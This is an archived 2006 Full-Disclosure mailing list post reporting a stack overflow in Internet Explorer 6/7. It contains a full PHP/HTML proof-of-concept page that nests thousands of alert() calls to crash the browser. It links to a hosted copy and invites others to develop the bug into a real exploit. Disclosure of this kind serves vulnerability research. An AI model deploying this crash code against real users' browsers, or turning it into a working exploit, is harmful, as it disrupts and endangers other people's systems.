lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <ffa3f0850611260212w1e56558eiccbaa57f4fcc3633@mail.gmail.com>
Date: Sun, 26 Nov 2006 11:12:25 +0100
From: Adriaan <adriaangraas@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Internet Explorer 6.x Stack Overflow

IE 6.x Stack Overflow

It is tested on IE7 and serveral versions of IE6, though not below 6.
In some cases the browser does not crash but displays a Run-time
memory full error.
This happens when Windows does not have SP2 - but I didn't test it thoroughly.

/* ie_stack.php */
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd ">
<html>
<head>
  <meta http-equiv="content-type" content="text/html;charset=UTF-8" />
  <title>Internet Explorer 6.x Stack Overflow</title>
</head>
<body>
<div style="width:400px;padding:10px;margin:10px;border:1px dashed silver;">
<p>
Copyright &copy; Adriaan Graas<br />
Internet Explorer 6.x Stack Overflow
</p>
<p>
Change the amount of code by changing the <tt>GET j</tt> variable in
the url, f.e. <tt>index.php?j=10000</tt>.
</p>
<script language="JavaScript">
<!--
<?php
if(!isset($_GET['j'])) $_GET['j']=10000;
if($_GET['j'] < 1000000){
for($i=0;$i<$_GET['j'];$i++){ echo"alert(alert("; }
for($i=0;$i<$_GET['j'];$i++){ echo"))"; }
}else{
 echo"document.write(\"Sorry, <tt>j >= 1000000</tt> is not allowed.\");";
}
?>
// -->
</script>
</div>
</body>
</html>
/* End of file */

This script is also hosted here:
http://www.pc1337.nl/iestack/iestack.php?j=10000.

The php can easily be rewritten to javascript or vbscript.
In fact, you can use functions different than alert() to overflow the stack.
I am not experienced enough to exploit this. It would be nice if
someone works this out. More tests are also welcome.

Adriaan Graas

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ